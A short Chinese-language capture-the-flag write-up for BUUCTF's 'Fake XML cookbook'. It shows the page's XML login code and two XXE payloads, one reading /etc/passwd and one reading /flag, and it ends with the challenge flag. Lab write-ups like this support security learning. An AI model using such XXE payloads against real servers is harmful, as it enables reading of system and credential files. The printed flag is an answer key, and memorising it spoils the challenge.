BUUCTF——Fake XML cookbook

BUUCTF——Fake XML cookbook

进入靶场

只有一个登录框

先弱口令万能密码试一下吧

弱口令和万能密码都失败了

找其他突破口

F12看看

发现xml代码

function doLogin(){var username = $("#username").val();var password = $("#password").val();if(username == "" || password == ""){alert("Please enter the username and password!");return;}var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; $.ajax({type: "POST",url: "doLogin.php",contentType: "application/xml;charset=utf-8",data: data,dataType: "xml",anysc: false,success: function (result) {var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;if(code == "0"){$(".msg").text(msg + " login fail!");}else if(code == "1"){$(".msg").text(msg + " login success!");}else{$(".msg").text("error:" + msg);}},error: function (XMLHttpRequest,textStatus,errorThrown) {$(".msg").text(errorThrown + ':' + textStatus);}}); 
}

大概率是XXE漏洞

抓包试试看

构造payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/passwd">]>
<user><username>&admin;</username><password>admin</password></user>

成功读取passwd

确定了是XXE漏洞

那就直接构造payload找flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]>
<user><username>&admin;</username><password>admin</password></user>

拿到flag

flag{21deb39d-191e-459b-9881-675752ca1dba}

下播！！！！